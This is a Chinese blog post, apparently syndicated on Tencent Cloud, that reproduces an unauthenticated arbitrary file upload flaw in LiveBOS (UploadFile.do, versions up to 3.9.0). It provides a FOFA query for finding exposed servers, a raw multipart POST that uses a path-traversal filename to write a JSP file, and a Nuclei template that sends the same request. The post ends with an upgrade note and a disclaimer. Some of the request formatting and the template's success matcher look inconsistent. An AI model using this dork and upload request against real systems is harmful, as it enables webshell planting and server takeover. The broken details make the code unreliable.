前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】LiveBOS UploadFile.do 任意文件上传

【漏洞复现】LiveBOS UploadFile.do 任意文件上传

作者头像
没事就要多学习
发布2024-08-11 08:40:37
2710
发布2024-08-11 08:40:37
举报
文章被收录于专栏:Cyber Security

0x00 漏洞描述

LiveBOS 是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。 LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

影响范围

福建顶点软件股份有限公司-LiveBos <= 3.9.0

0x01 测绘工具

fofa: body=“Power by LiveBOS”

0x02 漏洞复现

代码语言:javascript
复制
POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../test.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("test");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

0x03 Nuclei检测脚本

代码语言:javascript
复制
id: LiveBOS UploadFile.do 任意文件上传

info:
  name: LiveBOS UploadFile.do 任意文件上传
  author: admin
  severity: critical
  description: |
    This template detects a file upload vulnerability that allows for 
    the upload of arbitrary files, including JSP files that can be executed on the server.
  reference:
    - https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

requests:
  - raw:
      - |
        POST /feed/UploadFile.do;.js.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
        Connection: close

        ----WebKitFormBoundaryxegqoxxi
        Content-Disposition: form-data; name="file"; filename="/../../../../test.jsp"
        Content-Type: image/jpeg

        <%@ page import="java.io.File" %>
        <%
         out.println("");
         String filePath = application.getRealPath(request.getServletPath());
         new File(filePath).delete();
        %>
        ----WebKitFormBoundaryxegqoxxi--

    matchers:
      - type: word
        words:
          - "file uploaded successfully"
        part: body

0x04 修复建议

厂商已发布安全修复版本,请及时联系官方售后或客服升级至最新版本,https://www.livebos.com

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-08-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 漏洞描述
    • 影响范围
    • 0x01 测绘工具
    • 0x02 漏洞复现
    • 0x03 Nuclei检测脚本
    • 0x04 修复建议
    • 0x05 免责声明
    相关产品与服务
    消息队列 TDMQ
    消息队列 TDMQ (Tencent Distributed Message Queue)是腾讯基于 Apache Pulsar 自研的一个云原生消息中间件系列,其中包含兼容Pulsar、RabbitMQ、RocketMQ 等协议的消息队列子产品,得益于其底层计算与存储分离的架构,TDMQ 具备良好的弹性伸缩以及故障恢复能力。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档